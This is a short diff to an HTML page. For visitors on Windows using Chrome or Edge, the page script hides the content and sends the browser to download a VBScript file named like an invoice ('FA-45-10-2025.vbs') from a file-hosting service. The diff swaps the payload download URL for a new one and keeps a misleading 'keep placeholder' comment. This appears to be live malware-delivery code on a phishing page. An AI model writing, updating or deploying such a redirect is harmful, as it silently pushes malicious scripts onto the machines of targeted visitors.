--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store-eu-par-4.gofile.io/download/direct/4820d771-4076-4765-9e3b-1f3205ce416b/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://store10.gofile.io/download/direct/f8c04e23-48ce-4d36-b848-02338617e69c/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
